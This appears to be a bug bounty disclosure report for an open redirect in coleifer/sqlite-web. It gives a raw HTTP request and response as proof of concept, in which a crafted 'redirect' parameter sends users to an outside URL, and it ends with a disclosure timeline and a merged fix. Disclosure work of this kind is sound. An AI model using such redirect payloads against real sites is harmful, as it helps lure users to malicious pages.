Open Redirection in coleifer/sqlite-web

Valid

Reported on

Mar 26th 2022


Description

Open redirect security flaw an attacker to redirect the victims of the application into malicious sites

Proof of Concept

Request 

POST /create-table/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/
Cookie: session=
Upgrade-Insecure-Requests: 1

redirect=http://google.com&table_name=

Response

HTTP/1.0 302 FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 240
Location: http://google.com
Server: Werkzeug/2.0.2 Python/3.9.9
Date: Sat, 26 Mar 2022 11:45:25 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="http://google.com">http://google.com</a>. If not click the link.

Impact

Redirect to unsafe pages

We are processing your report and will contact the coleifer/sqlite-web team within 24 hours. 2 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the coleifer/sqlite-web team and are waiting to hear back 2 months ago
We have sent a follow up to the coleifer/sqlite-web team. We will try again in 7 days. 2 months ago
Jamie Slome modified the report
2 months ago
Jamie Slome
2 months ago

Admin


The maintainer has indicated that this does not have any security implications and so the severity has been assigned None.

I will approve and confirm the fix in any case, as this report was technically addressed with a patch.

Jamie Slome validated this vulnerability 2 months ago
0xdhinu has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome confirmed that a fix has been merged on ce8214 2 months ago
The fix bounty has been dropped
sqlite_web.py#L222 has been validated
to join this conversation